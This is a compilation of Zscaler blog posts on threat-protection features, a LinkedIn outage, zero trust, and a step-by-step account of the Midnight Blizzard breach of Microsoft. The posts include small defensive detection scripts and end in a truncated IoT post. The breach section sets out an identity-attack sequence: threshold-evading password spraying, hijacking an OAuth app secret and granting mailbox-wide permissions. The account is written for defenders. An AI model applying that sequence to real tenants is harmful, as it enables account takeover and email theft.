Foil digital fraud and cryptomining attempts

AI-Powered Phishing Detection
Phishing is becoming harder to stop. New tactics include phishing kits sold on the black market, which let even unsophisticated criminals spin up phishing campaigns and malicious web pages that can be updated in a matter of hours, faster than most detection and prevention solutions can keep up with. Phishing pages trick users into submitting their credentials, which attackers use in turn to compromise victims’ accounts. With Zscaler ATP, you can prevent compromises from patient zero phishing pages inline with advanced AI-based detection.

Known Phishing Sites
Phishing websites mimic legitimate banking and financial sites to fool users into thinking they can safely submit account numbers, passwords, and other personal information, which criminals can then use to steal their money. Enable this policy to prevent users from visiting known phishing sites.

Suspected Phishing Sites
Zscaler can inspect a website’s content for indications that it is a phishing site, and then use AI to stop phishing attack vectors. As part of a highly commoditized attack method, phishing pages can have a lifespan of a few hours, yet most phishing URL feeds lag 24 hours behind—a gap that can only be closed by a capability able to stop both new and unknown phishing attacks.

Spyware Callback
Adware and spyware sites gather users’ information without their knowledge and sell it to advertisers or criminals.
When "Spyware Callback" blocking is enabled, Zscaler ATP prevents spyware from calling home and transmitting sensitive user data such as address, date of birth, and credit card information.

Cryptomining
Most organizations block cryptomining traffic to prevent cryptojacking, where malicious scripts or programs secretly use a device to mine cryptocurrency, consuming resources and degrading the performance of infected machines. Enabling "Block" in ATP’s configuration settings prevents cryptomining from entering your environment via user devices.

Known Adware & Spyware Sites
Threat actors stage legitimate-looking websites designed to distribute potentially unwanted applications (PUAs). These web requests can be denied based on the reputation of the destination IP address or domain name. Choose "Block" in the ATP policy configuration to prevent your users from accessing known adware and spyware sites.

Shut down unauthorized communication

Unauthorized communication refers to the tactics and tools attackers use to bypass firewalls and proxies, such as IRC tunneling applications and "anonymizer" websites.

IRC Tunneling
The Internet Relay Chat (IRC) protocol was created in 1988 to allow real-time text messaging between internet-connected computers. Primarily used in chat rooms (or "channels"), the IRC protocol also supports data transfer as well as server- and client-side commands. While most firewalls block the IRC protocol, they may allow SSH connections. Attackers take advantage of this to tunnel their IRC connections via SSH, bypass firewalls, and exfiltrate data. Enabling this policy option blocks IRC traffic from being tunneled over HTTP/S.

SSH Tunneling
SSH tunneling enables sending data through an existing SSH connection, with the traffic tunneled over HTTP/S. While there are legitimate uses for SSH tunnels, bad actors can use them as an evasion technique to exfiltrate data. Zscaler ATP can block this activity.
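As a rough illustration of the tunneling discussion above: one simple signal a proxy can use is the target port of a CONNECT request, since IRC and SSH use well-known ports that ordinary web traffic does not. This is a simplified heuristic of my own for illustration, not Zscaler’s actual detection logic, which inspects traffic content rather than relying on ports alone.

```python
# Simplified, port-based tunneling heuristic (illustrative only; real inline
# inspection classifies by content, since tunnels can ride ports 80/443).

IRC_PORTS = {194, 6665, 6666, 6667, 6668, 6669, 6697}  # plaintext + TLS IRC
SSH_PORT = 22

def classify_connect(host: str, port: int) -> str:
    """Classify a proxied CONNECT target as web, irc-tunnel, ssh-tunnel, or other."""
    if port in IRC_PORTS:
        return "irc-tunnel"
    if port == SSH_PORT:
        return "ssh-tunnel"
    return "web" if port in (80, 443) else "other"

print(classify_connect("irc.example.net", 6667))
```

A port check like this catches only naive tunnels; that is precisely why the post emphasizes content inspection of HTTP/S traffic.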
Anonymizers
Attackers use anonymizer applications to obscure the destination and content they want to access. Anonymizers enable the user to bypass policies that control access to websites and internet resources. Enabling this policy option blocks access to anonymizer sites.

Block cross-site scripting (XSS) and other malicious web requests

Cross-site scripting (XSS) is an attack tactic wherein bad actors inject malicious scripts into otherwise trusted websites. XSS attacks occur when a threat actor uses a web app to send malicious code, usually in the form of a client-side script, to a different end user.

Cookie Stealing
Cookie stealing, or session hijacking, occurs when bad actors harvest session cookies from users’ web browsers so they can gain access to sensitive data, including valuable personal and financial details they in turn sell on the dark web or use for identity theft. Attackers also use cookies to impersonate a user and log in to their social media accounts.

Potentially Malicious Requests
Variants of XSS requests enable attackers to exploit vulnerabilities in a web application so they can inject malicious code into a website. When other users load a page from the target web server in their browser, the malicious code executes, expanding the attack exponentially.

Prevent compromise via peer-to-peer file sharing

P2P programs enable users to easily share files with each other over the internet. While there are legitimate uses of P2P file sharing, these tools are also frequently used to illegally acquire copyrighted or protected content, and the same content files can contain malware embedded within legitimate data or programs.

BitTorrent
The Zscaler service can block the use of BitTorrent, a communication protocol for decentralized file transfers supported by various client applications. While its usage was once pervasive, torrent traffic has decreased from a high of 35% of all global internet traffic in the mid-2000s to just 3% in 2022.
Tor
Tor is a P2P anonymizer protocol that obscures the destination and content accessed by a user, enabling them to bypass policies controlling what websites or internet resources they can access. With Zscaler ATP, you can block use of the Tor protocol.

Avoid VoIP bandwidth overutilization

While convenient for online meetings, video conferencing tools can be bandwidth-intensive. They may also be used to transfer files or other sensitive data. Depending on both your organization's risk tolerance and overall network performance, you may want to curtail employee or contractor use of Google Hangouts.

Google Hangouts
While VoIP application usage may be encouraged for cost savings over traditional landline-based communications, it is often associated with high bandwidth consumption. Google Hangouts (a.k.a. Google Meet) requires a single video call participant to have 3.2 Mbps of outbound bandwidth; required inbound bandwidth starts at 2.6 Mbps for two users and grows with additional participants. In Zscaler ATP, you can block Google Hangouts usage to conserve bandwidth for other business-critical applications.

Comprehensive, always-on, real-time protection

Clearly, there’s a wide swath of protection modern organizations need to fortify their security posture on an ongoing basis. Zscaler Advanced Threat Protection delivers always-on protection against ransomware, zero-day threats, and unknown malware as part of the most comprehensive suite of security capabilities, powered by the world's largest security cloud—all at no extra cost to ZIA customers. ATP filters and blocks threats directed at ZIA customers and, in combination with Zscaler Firewall and Zscaler Sandbox, provides superior threat prevention thanks to:
- A fully integrated suite of AI-powered security services that closes security gaps and reduces risks left by other vendors’ security tools.
- Zscaler Sandbox, which detects zero-day malware for future-proof protection, while Zscaler Firewall provides IPS, DNS control, and filtering of the latest non-web threats.
- Real-time threat visibility to stay several steps ahead of threat actors. You can’t wait for another vendor’s tool to finish scheduled scans to determine if you’re secure—that puts your organization at risk. Effective advanced threat protection from Zscaler monitors all your traffic at all times.
- Centralized context and correlation that provides the full picture for faster threat detection and prevention. Real-time, predictive cybersecurity measures powered by advanced AI continuously give your IT or security team the ability to outpace attackers.
- The ability to inspect 100% of traffic with Zscaler’s security cloud distributed across 150 points of presence worldwide. Operating as a cloud-native proxy, the Zscaler Zero Trust Exchange ensures that every packet from every user, on or off the network, is fully inspected with unlimited capacity—including all TLS/SSL encrypted traffic.

Learn more about how Zscaler prevents encrypted attacks and best practices for stopping encrypted threats by securing TLS/SSL traffic: download a copy of the Zscaler ThreatLabz 2023 State of Encrypted Attacks Report.

Mon, 11 Mar 2024 07:00:01 -0700 Brendon Macaraeg

LinkedIn Outage Detected by Zscaler Digital Experience (ZDX)

At 3:40 p.m. EST on March 6, 2024, Zscaler Digital Experience (ZDX) saw a substantial, unexpected drop in the ZDX score for LinkedIn services around the globe. Upon analysis, we noticed HTTP 503 errors highlighting a LinkedIn outage, with the ZDX heatmap clearly detailing the impact at a global scale.

ZDX dashboard indicating widespread LinkedIn outage

ZDX enables customers to proactively identify and quickly isolate service issues, giving IT teams confidence in the root cause and reducing mean time to detect (MTTD) and mean time to resolve (MTTR).
ZDX dashboard showing LinkedIn global issues

ZDX Score highlights LinkedIn outage

Visible on the ZDX admin portal dashboard, the ZDX Score represents all users in an organization across all applications, locations, and cities on a scale of 0 to 100, with the low end indicating a poor user experience. Depending on the time period and filters selected in the dashboard, the score adjusts accordingly. The dashboard shows that the ZDX Score for the LinkedIn probes dropped to zero during the outage window of approximately one hour. From within ZDX, service desk teams can easily see that the service degradation isn’t limited to a single location or user and can quickly begin analyzing the root cause.

ZDX Score indicating LinkedIn outage and recovery (times in EST)

Also in the ZDX dashboard, "Web Probe Metrics" highlight the user impact of reaching LinkedIn applications across a timeline with response times. In this case, the server responded with 503 errors, indicating the server was not ready to handle requests.

ZDX Web Probe Metrics indicating 503 errors (times in EST)

ZDX can quickly identify the root cause of user experience issues with its new AI-powered root cause analysis capability. This spares IT teams the labor of sifting through fragmented data and troubleshooting, thereby accelerating resolution and keeping employees productive. With a simple click in the ZDX dashboard, you can analyze a score, and ZDX will provide insight into potential issues. In the case of this LinkedIn outage, ZDX highlights that the application is impacted while the network itself is fine.

ZDX AI-powered root cause analysis indicates the reason for the outage

When there’s an application outage, many IT teams turn to the network as the root cause. However, ZDX AI-powered root cause analysis verified that the network transport wasn’t the issue; it was actually at the application level.
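The web probe signal behind this determination can be approximated in a few lines: a probe that receives an HTTP 5xx (like the 503s during this outage) contributes a zero score, and healthy responses score lower as fetch latency grows. ZDX’s real scoring model is proprietary; everything below, including the linear latency decay and the function name, is an assumed simplification for illustration.

```python
# Assumed, simplified probe scoring; ZDX's real model is proprietary.
# A 5xx response (e.g. the 503s during the LinkedIn outage) scores 0;
# otherwise the score decays linearly with page-fetch latency.

def probe_score(status_code: int, latency_ms: float,
                worst_latency_ms: float = 5000.0) -> float:
    """Return a 0-100 experience score for one synthetic web probe."""
    if status_code >= 500:
        return 0.0  # server failed to handle the request at all
    penalty = min(latency_ms / worst_latency_ms, 1.0)  # cap at total penalty
    return round(100.0 * (1.0 - penalty), 1)

print(probe_score(503, 120))   # outage window: score collapses to zero
print(probe_score(200, 250))   # healthy, fast response: near-perfect score
```

Averaging such per-probe scores across users, locations, and applications is what lets a dashboard-level score drop to zero the moment a service starts returning only errors.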
You can verify this by looking at the CloudPath metrics from the user to the destination.

ZDX CloudPath showing the full end-to-end data path

ZDX CloudPath detailing hops between the nodes

With AI-powered analysis and dynamic alerts, IT teams can quickly compare optimal vs. degraded user experiences and set intelligent alerts based on deviations in observed metrics. ZDX allows you to compare two points in time to understand the differences between them. This function distinguishes a good vs. poor user experience, visually highlighting the differences between application, network, and device metrics. The end user comparison during the LinkedIn outage vs. a known good score shows the ZDX Score difference, highlighting the unexpected performance drop for the end user.

ZDX comparison mode identifies the change in user experience

According to the LinkedIn status page, the outage ran from 12:50 PST until 14:05 PST, which correlates with the ZDX data above. LinkedIn services started to recover quickly, by 13:40 PST, and LinkedIn reported the issue resolved by 14:05 PST. (Source: LinkedIn)

With ZDX alerting, our customers were proactively notified about end user problems, and incidents were opened automatically through our service desk integrations (e.g., ServiceNow) long before users started to report them. From a single dashboard, customers were able to quickly identify this as a LinkedIn issue, not an internal network outage, saving precious IT time. Zscaler Digital Experience successfully detected the LinkedIn outage along with its root cause, giving our customers confidence that the problem was not a single location, their networks, or their devices, averting critical impact to their business.

Try Zscaler Digital Experience today

ZDX helps IT teams monitor digital experiences from the end user perspective to optimize performance and rapidly fix offending application, network, and device issues. To see how ZDX can help your organization, please contact us.
Thu, 07 Mar 2024 19:14:07 -0800 Rohit Goyal

Why Haven’t Firewalls and VPNs Stopped More Organizations from Being Breached?

Reducing cyber risk is an increasingly important initiative for organizations today. Because a single cyber breach can be financially fatal as well as disastrous for countless stakeholders, improving cybersecurity has become a board-level concern and drawn increased attention from regulatory bodies around the globe. As a result, organizations everywhere have poured massive amounts of time and money into security technologies that are supposed to protect them from cybercriminals’ malicious ends. Specifically, the go-to tools deployed in an effort to enhance security are firewalls and VPNs. Despite this, breaches continue to occur, and increase in number, at an alarming rate every year. News headlines about particularly noteworthy breaches serve as continual reminders that improperly mitigating risk can be catastrophic, and that the standard tools for ensuring security are insufficient. One need not look far for concrete examples—the security debacles at Maersk and Colonial Pipeline are powerful, salient illustrations of what can go wrong. With more and more organizations falling prey to our risk-riddled reality, an obvious question arises: Why haven’t firewalls and VPNs stopped more organizations from being breached?

The weaknesses of perimeter-based architectures

Firewalls and VPNs were designed for an era gone by: when users, apps, and data resided on premises; when remote work was the exception; when the cloud had not yet materialized. In that age of yesteryear, their primary focus was on establishing a safe perimeter around the network to keep the bad things out and the good things in.
Even for organizations with massive hub-and-spoke networks connecting various locations like branch sites, the standard methods of trying to achieve threat protection and data protection still inevitably involved securing the network as a whole. This architectural approach goes by multiple names, including perimeter-based, castle-and-moat, and network-centric. In other words, firewalls, VPNs, and the architecture they presuppose are intended for an on-premises-only world that no longer exists. The cloud and remote work have changed things forever. With users, apps, and data all leaving the building en masse, the network perimeter has effectively inverted, meaning more activity now takes place outside the perimeter than within it. And when organizations undergoing digital transformation try to cling to the traditional way of doing security, it creates a variety of challenges. These problems include greater complexity, administrative burden, and cost, as well as decreased productivity and, of primary importance for this blog post, increased risk.

How do firewalls and VPNs increase risk?

There are four key ways that legacy tools like firewalls and VPNs increase the risk of breaches and their numerous, harmful side effects. Whether they are hardware appliances or virtual appliances makes little difference.

They expand the attack surface. Deploying tools like firewalls and VPNs is supposed to protect the ever-growing network as it is extended to more locations, clouds, users, and devices. However, these tools have public IP addresses that can be found on the internet. This is by design, so that the intended users can access the network via the web and do their jobs, but it also means that cybercriminals can find these entry points into the network and target them. As more of these tools are deployed, the attack surface continually expands, and the problem worsens.

They enable compromise.
Organizations need to inspect all traffic and enforce real-time security policies if they are to stop compromise. But about 95% of traffic today is encrypted, and inspecting such traffic requires extensive compute power. Appliances have static capacities to handle a fixed volume of traffic and, consequently, struggle to scale as needed to inspect encrypted traffic as organizations grow. This means threats are able to pass through defenses via encrypted traffic and compromise organizations.

They allow lateral threat movement. Firewalls and VPNs primarily compose the "moat" in a castle-and-moat security model. They are focused on establishing a network perimeter, as mentioned above. Relying on this strategy, however, means there is little protection once a threat actor gets into the "castle," i.e., the network. As a result, following compromise, attackers can move laterally across the network, from app to app, and do extensive damage.

They fail to stop data loss. Once cybercriminals have scoured connected resources on the network for sensitive information, they steal it. This typically occurs via encrypted traffic to the internet, which, as explained above, legacy tools struggle to inspect and secure. Similarly, modern data leakage paths, such as sharing functionality inside SaaS applications like Box, cannot be secured with tools designed for a time when SaaS apps did not exist.

Why zero trust can stop organizations from being breached

Zero trust is the solution to these problems. It is a modern architecture that takes an inherently different approach to security in light of the fact that the cloud and remote work have changed things forever, as described earlier. In other words, zero trust leaves the weaknesses of perimeter-based, network-centric, firewall-and-VPN architectures in the past.
With an inline, global security cloud serving as an intelligent switchboard to provide zero trust connectivity (along with a plethora of other functionality), organizations can:
- Minimize the attack surface: Hide applications behind a zero trust cloud, eliminate security tools with public IP addresses, and prevent inbound connections
- Stop compromise: Leverage a high-performance cloud to inspect all traffic at scale, including encrypted traffic, and enforce real-time policies to stop threats
- Prevent lateral movement: Connect users, devices, and workloads directly to the apps they are authorized to access instead of connecting them to the network as a whole
- Block data loss: Prevent malicious data exfiltration and accidental data loss across all data leakage paths, including encrypted traffic, cloud apps, and endpoints

In addition to reducing risk, zero trust architecture solves problems related to complexity, cost, productivity, and more. If you would like to learn more about zero trust, join our upcoming webinar, "Start Here: An Introduction to Zero Trust." Or, if you would like to dive deeper into the weaknesses of yesterday’s tools, read our new ebook, "4 Reasons Firewalls and VPNs Are Exposing Organizations to Breaches."

Tue, 27 Feb 2024 08:04:02 -0800 Jacob Serpa

Microsoft, Midnight Blizzard, and the Scourge of Identity Attacks

Summary

On January 19, 2024, technology leader Microsoft disclosed that it had fallen victim to a Russian state-sponsored cyberattack that gave the threat actors access to senior management mailboxes and resulted in sensitive data leakage. We break down the attack step by step below and explain what organizations can do to defend against similar attacks, but here’s a TL;DR.
The threat actor
Midnight Blizzard: State-sponsored Russian threat actor also known as Nobelium, CozyBear, and APT29
Notable Midnight Blizzard breaches: Hewlett Packard Enterprise (December 12, 2023) and SolarWinds (December 14, 2020)

The facts
Attack target: Microsoft’s Entra ID environment
Techniques used: Password spraying, exploiting identity and SaaS misconfigurations
Impact: Compromised Entra ID environment; unauthorized access to email accounts of Microsoft’s senior leadership team, security team, legal team, and more

What’s unique about the attack?
- Using stealthy identity tactics that bypass existing defenses to compromise users
- Exploiting misconfigurations in SaaS applications to gain privileges
- Exploiting identity misconfigurations in Entra ID to escalate privileges

The attack sequence
1. Found a legacy, non-production test tenant in Microsoft’s environment.
2. Used password spraying via residential proxies to attack the test tenant.
3. Limited the number of attack attempts to stay under the threshold and evade blocking triggered by brute-forcing heuristics.
4. Guessed the right password and compromised the test tenant’s account.
5. Generated a new secret key for the test app, allowing the threat actor to control the app everywhere it was installed. The test app was also present in the corporate tenant.
6. Used the app’s permissions to create an admin user in the corporate tenant.
7. Used the new admin account to create malicious OAuth apps.
8. Granted the malicious app the privilege to impersonate users of the Exchange service.
9. Used the malicious app to access Microsoft employee email accounts.
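The low-and-slow password spraying in steps 2–3 leaves a recognizable shape in authentication logs: one source failing logins across many accounts with only a few attempts per account, rather than hammering a single account. The sketch below is a generic detection heuristic of my own, not a Zscaler or Microsoft detection; the thresholds are illustrative assumptions.

```python
# Generic spray heuristic (illustrative; not vendor detection logic):
# a source that fails logins across many distinct accounts, with only a
# few attempts per account, matches the low-and-slow pattern above.

from collections import defaultdict

def spray_sources(failed_logins, min_accounts=5, max_per_account=3):
    """failed_logins: iterable of (source_ip, username) failure events."""
    attempts = defaultdict(lambda: defaultdict(int))
    for ip, user in failed_logins:
        attempts[ip][user] += 1
    flagged = []
    for ip, per_user in attempts.items():
        if (len(per_user) >= min_accounts
                and max(per_user.values()) <= max_per_account):
            flagged.append(ip)
    return flagged

events = [("203.0.113.7", f"user{i}") for i in range(8)]   # 1 try each, 8 users
events += [("198.51.100.2", "admin")] * 30                 # brute force, not spray
print(spray_sources(events))
```

Note that residential proxies, as used in this attack, defeat a purely per-IP version of this check; real detections also correlate on user agent, timing, and other session attributes.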
Microsoft’s official guidance
- Defend against malicious OAuth applications
- Audit privileged identities and apps in your tenant
- Identify malicious OAuth apps
- Implement conditional access app control for unmanaged devices
- Protect against password spray attacks
- Eliminate insecure passwords
- Detect, investigate, and remediate identity-based attacks
- Enforce multi-factor authentication and password protections
- Investigate any possible password spray activity

Zscaler’s guidance
- Continuously assess SaaS applications for misconfigurations, excessive permissions, and malicious changes that open up attack paths.
- Continuously assess Active Directory and Entra ID (formerly Azure AD) for misconfigurations, excessive permissions, and malicious changes that open up attack paths.
- Monitor users with risky permissions and misconfigurations for malicious activity, such as DCSync, DCShadow, and Kerberoasting, that is typically associated with an identity attack.
- Implement containment and response rules to block app access, isolate the user, or quarantine the endpoint upon detection of an identity attack.
- Implement deception to detect password spraying, Entra ID exploitation, Active Directory exploitation, privilege escalation, and lateral movement in instances where stealthy attacks bypass existing detection and monitoring controls.

Deconstructing the attack

The threat actor Midnight Blizzard has a long history of pulling off highly publicized breaches. It’s Microsoft this time around, but in the past, the group has allegedly compromised Hewlett Packard Enterprise and SolarWinds. To people who analyze attacks for a living, the Microsoft breach should not come as a surprise. Midnight Blizzard is among a growing list of nation-state and organized threat actors that rely on identity compromise and on exploiting misconfigurations and permissions in SaaS applications and identity stores to execute breaches that conventional security thinking cannot defend against.
Other threat groups using these strategies and techniques include Evil Corp, Lapsus$, BlackMatter, and Vice Society. In the case of the Microsoft breach, the attackers demonstrated a profound understanding of OAuth mechanics and attack techniques to evade detection controls. They created malicious applications to navigate Microsoft's corporate environment, and by manipulating OAuth permissions, they granted themselves full access to Office 365 Exchange mailboxes, enabling them to easily exfiltrate sensitive emails.

Security challenges
- Identity-centric tactics: Midnight Blizzard strategically targeted identities, exploiting users' credentials as a gateway to sensitive data. Conventional detection controls like EDRs are not effective against such attacks.
- OAuth application abuse: The adversaries adeptly abused OAuth applications, a technique that complicates detection and enables prolonged persistence.
- Misconfiguration blind spots: Identifying misconfigurations within Active Directory/Entra ID and SaaS environments remains a complex task, often resulting in blind spots for defenders.

Step-by-step breakdown

Pre-breach
Before the attack commenced, an admin within Microsoft's test tenant had created an OAuth app. For the purposes of this blog post, let’s call this app ‘TestApp.’ For reasons unknown, this app was subsequently installed in Microsoft's corporate environment with elevated permissions, likely encompassing the scope Directory.ReadWrite.All, granting it the capability to create users and assign roles. Notably, this app appeared to be dormant and possibly forgotten.

ThreatLabz note: There is an unimaginable sprawl of applications, users, and associated misconfigurations and permissions that security teams often have no visibility into. More often than not, blind spots like these are what result in publicized breaches.

Initial access
In late November 2023, Midnight Blizzard initiated reconnaissance on Microsoft's SaaS environment.
Discovering the test tenant, the attacker targeted its admin account, which, being a test account, had a weak, guessable password and lacked multi-factor authentication (MFA). Employing a password spraying attack, the attacker systematically attempted common passwords to gain access, leveraging residential proxies to obfuscate their origin and minimize suspicion. Eventually, the attacker successfully compromised the admin account.

ThreatLabz note: Traditional threat detection and monitoring controls are ineffective against attacks that use valid credentials, MFA prompt bombing, and other identity-centric techniques to compromise users.

Persistence

With control over the admin account, the attacker gained the ability to generate a new secret key for TestApp, effectively commandeering it across all installations. This tactic mirrors techniques observed in the SolarWinds attack of 2020.

ThreatLabz note: In the absence of continuous monitoring and high-confidence alerting for malicious changes made to permissions in SaaS applications, attacks like these easily cross the initial access phase of the kill chain.

Privilege escalation

Given TestApp's permissions within Microsoft's corporate tenant, the attacker created a new user, likely an administrator, to further their access. Subsequently, the attacker deployed additional malicious OAuth apps within the tenant to evade detection and ensure persistence, leveraging TestApp to grant elevated roles, such as the Exchange role EWS.full_access_as_app, facilitating mailbox access and bypassing MFA protection.

ThreatLabz note: Configuration- and permission-based blind spots extend to identities themselves. As such, it is imperative that organizations be able to continuously assess their Active Directory/Entra ID for misconfigurations, excessively permissive policies, and other permissions that give attackers the ability to escalate privileges from a compromised identity.
They should also continuously monitor for malicious changes in the identity store that might be creating additional attack surface.

Lateral movement

Though specifics regarding the number and origin of installed apps remain unclear, the attacker's use of TestApp to confer privileges is evident. This culminated in unauthorized access to mailboxes belonging to Microsoft's senior leadership, security personnel, legal team, and other stakeholders.

How zero trust can help

A zero trust architecture provides a fundamentally more secure approach that is better at protecting against the stealthy attacks used by nation-state threat actors and organized adversaries. Zero trust eliminates weaknesses in your environment that are core properties of hub-and-spoke network models. Below is a 10,000-foot reference architecture for zero trust that explains how and why it better protects against Midnight Blizzard-style attacks.

Core zero trust capabilities

This is the heart of a zero trust architecture, consisting of Internet Access and Private Access. The Zero Trust Exchange acts as a switchboard brokering all connections between users and applications. This architecture makes your applications invisible to the internet, thereby eliminating the external attack surface, replaces high-risk VPNs, and uses segmentation to reduce lateral threat movement and internal blast radius. To broker a connection, the Zero Trust Exchange verifies the identity, determines the destination, assesses risk, and enforces policy.

ThreatLabz note: Zscaler extends core zero trust capabilities with SaaS supply chain security, Identity Posture Management, ITDR, Deception, and Identity Credential Exposure to eliminate application and identity misconfigurations, detect stealthy attacks, and provide visibility into exposed credentials on endpoints to remove lateral movement paths. Below, we break down what each of these capabilities can do.
SaaS Security

While the move to the cloud and SaaS applications has helped organizations accelerate their digital transformation, it has also created a new set of security challenges. Among these, the lack of visibility into dangerous backdoor connections to SaaS applications is paramount, as it creates supply chain risk, the kind that was exploited in the Microsoft breach. SaaS Security strengthens your security posture by providing visibility into third-party application connections, over-privileged access, and risky permissions, along with continuous monitoring for changes that can be malicious in nature. It is a core step in securing your SaaS environment.

Identity Posture Management

Nine in ten organizations are exposed to Active Directory attacks, and there was a 583% increase in Kerberoasting and similar identity attack techniques in 2023 alone. These are not isolated phenomena. Misconfigurations and excessive permissions in Active Directory and other identity providers are what enable these types of attacks. For example, an unprivileged account without MFA that can control an application with privileged roles should be flagged, but most security teams do not have adequate visibility into these types of misconfigurations. Identity Posture Management augments zero trust by giving security teams visibility into identity misconfigurations, policies, and permissions that open up potential attack paths. With periodic assessments, security teams can leverage remediation guidance to revoke permissions, limit policies, and remove misconfigurations. Identity Posture Management also alerts security teams to malicious changes in Active Directory in real time.

Deception and ITDR (Identity Threat Detection and Response)

As evidenced in the Microsoft breach, attackers used password spraying from a residential proxy and limited the number of tries to evade detection. Traditional threat detection and monitoring approaches just do not work here.
Deception, on the other hand, is a pragmatic approach that can detect these attacks with fairly high confidence. Decoy users created in Entra ID can detect such password spraying attacks without false positives or the need to write complex detection rules. ITDR can detect identity-specific attacks like DCSync, DCShadow, and Kerberoasting that would otherwise require detection engineering and significant triage to spot.

Identity Credential Exposure

While TTPs (tactics, techniques, and procedures) for credential exploitation were not reported in this breach, credentials and other sensitive material (usernames, passwords, authentication tokens, connection strings, etc.) left on endpoints in files, registries, and other caches are something that threat actors like Volt Typhoon, Scattered Spider, BlackBasta, BlackCat, and LockBit are known to have exploited in publicly reported breaches. Identity Credential Exposure provides security teams with visibility into credential exposure across their endpoint footprint, highlighting blind spots that open up lateral movement and data access paths from the endpoint.

Zero trust creates multiple opportunities to detect and stop Midnight Blizzard-style attacks

Problem: Password spraying
Solution: Zscaler Deception
How it works: Decoy user accounts in Entra ID can detect any attempt to sign in using the decoy users' credentials. Any failed or successful attempt is logged to detect attacks like password spraying.
MITRE ATT&CK techniques: T1110.003 - Brute Force: Password Spraying; T1078.004 - Valid Accounts: Cloud Accounts

Problem: Existence of apps/SPNs with high privilege
Solution: Zscaler ITDR
How it works: ITDR can surface unprivileged accounts that have a path (e.g., owner rights) to apps with privileged roles.
MITRE ATT&CK techniques: N/A

Problem: Creation of apps/SPNs with high privilege
Solution: Zscaler SaaS Security
How it works: Monitors for and alerts when a risky app is added, an app is created by an unverified publisher, or an app hasn't been used in a while.
MITRE ATT&CK techniques: No technique maps to this directly, but the following are close approximations: T1136.003 - Create Account: Cloud Account; T1098.003 - Account Manipulation: Additional Cloud Roles

Problem: Creation/modification of users with high privileges
Solution: Zscaler ITDR
How it works: Monitors for and alerts on unauthorized addition of privileged permissions to principals.
MITRE ATT&CK techniques: T1136.003 - Create Account: Cloud Account; T1098.003 - Account Manipulation: Additional Cloud Roles

Problem: Secret addition to apps
Solution: Zscaler SaaS Security
How it works: Flags applications with multiple application secrets.
MITRE ATT&CK techniques: T1098.001 - Account Manipulation: Additional Cloud Credentials

Problem: Disabled MFA
Solution: Zscaler ITDR
How it works: Finds accounts where MFA is disabled and alerts when MFA is disabled for any account.
MITRE ATT&CK techniques: T1556.006 - Modify Authentication Process: Multi-Factor Authentication

Problem: Consent grants
Solution: Zscaler SaaS Security
How it works: Monitors the inclusion of high-risk scopes like EWS.full_access_as_app or EWS.AccessAsUser.All to alert on the app's risk level.
MITRE ATT&CK techniques: T1098.003 - Account Manipulation: Additional Cloud Roles; T1098.002 - Account Manipulation: Additional Email Delegate Permissions

What should I do next?

Identity is the weakest link. Irrespective of whether you are running a zero trust architecture or not, start by getting visibility into identity misconfigurations and excessive permissions that can allow attackers to grant themselves privileges.
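To make the decoy-account detection described above concrete, here is a minimal sketch of why it is high confidence: no legitimate workflow ever authenticates as a decoy user, so any sign-in attempt against one, failed or successful, is signal. The decoy names and event shape below are hypothetical, not Zscaler's implementation.

```python
# Illustrative sketch: flag any authentication attempt against known decoy
# principals. Decoy names and the event format are made-up examples.

DECOY_USERS = {"svc-backup-admin", "jsmith-finance"}  # decoys seeded in Entra ID

def decoy_alerts(signin_events):
    """Return every sign-in event that targets a decoy user, success or not."""
    return [e for e in signin_events if e["user"] in DECOY_USERS]

events = [
    {"user": "alice", "source_ip": "10.0.0.5", "success": True},
    {"user": "svc-backup-admin", "source_ip": "203.0.113.7", "success": False},
]
for alert in decoy_alerts(events):
    print(f"High-confidence alert: sign-in attempt against decoy "
          f"'{alert['user']}' from {alert['source_ip']}")
```

Because the rule fires only on accounts nobody should touch, it sidesteps the false-positive problem that per-IP heuristics face when attackers rotate through residential proxies, as Midnight Blizzard did.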
We’re offering a complimentary Identity Posture Assessment with Zscaler ITDR. Gain visibility into your SaaS sprawl and find dangerous backdoor connections that can give attackers the ability to establish persistence. Request an assessment with Zscaler SaaS Security. Implement Deception irrespective of what other threat detection measures you have. It is one of the highest-ROI threat detection controls you can implement, augmenting controls like EDR. Zscaler Deception has a comprehensive set of decoys that can deceive and detect sophisticated attackers. If you are a Zscaler customer, contact your account manager for support with these assessments and Deception rollout. Tue, 13 Feb 2024 17:10:20 -0800 Amir Moin

Start Your Journey in IT Support: A Beginner's Guide

Navigating the nuances of IT troubleshooting can be challenging, especially if you're just starting out. Our ebook, A Beginner’s Guide to Troubleshooting Devices, Networks, and Applications for Service Desk Teams, breaks down the essentials of IT support in a clear, digestible format, making it a great resource for newcomers eager to become effective service desk team members. It’s a practical guide even for those with limited time. Whether you're dealing with device issues, network complexities, or application troubleshooting, you’ll find step-by-step instructions that are easy to follow even with minimal IT knowledge. We’ve designed this guide to help you enhance your troubleshooting skills, gain the confidence you need to master IT problem-solving, and become a valuable asset to any service desk team. In this ebook, you'll find:

An overview of service desk challenges: Understand the evolving IT landscape and the pivotal role of IT support in maintaining productivity.
Step-by-step ticket resolution processes: Learn how to handle and resolve IT issues efficiently, enhancing customer satisfaction.
Categorization of IT issues: Familiarize yourself with common problems in devices, networks, and applications, along with strategies to tackle them.
A focus on device, networking, and application issues: Gain insights into specific challenges in these areas and learn practical solutions.
Strategies to enhance troubleshooting workflows: Discover how to streamline IT support processes and use advanced technologies for better problem-solving.

It’s also an excellent tool for service desk managers looking to expedite team onboarding. By equipping your team with this resource, you’ll enable them to handle a wide range of IT issues independently. It reduces the need for escalations and empowers analysts to solve problems efficiently. Ultimately, it can not only enhance your service desk team’s capabilities, but also significantly shorten the time it takes for new analysts to become proficient. Download the ebook today and transform your service desk team! Fri, 09 Feb 2024 19:14:07 -0800 Rohit Goyal

IoT/OT Predictions for 2024

How many smart home devices are you running where you live? Smart speakers, thermostats, cameras, light bulbs, etc. Have you lost count yet? You could be forgiven, because Forbes projects there could be as many as 207 billion of these devices out in the world by the end of this year! By my calculation, that works out to more than 25 devices for every human on the planet! In this blog, we’ll cover some of the top IoT/OT predictions for 2024, covering everything from AI at the edge to ransomware. Let’s jump in.

IoT/OT devices will see a higher degree of proliferation than ever before

Losing count of how many devices you have isn’t just a nuisance in the workplace; it’s a very real problem, particularly from a cybersecurity perspective.
The challenge of keeping track of your IoT devices—not to mention keeping them secure—is only going to grow harder with the proliferation of sensors, monitors, point-of-sale systems, and the myriad other devices feeding our hunger for data. Fortunately, we’ve been working on that.

Edge AI will make these devices smarter, faster

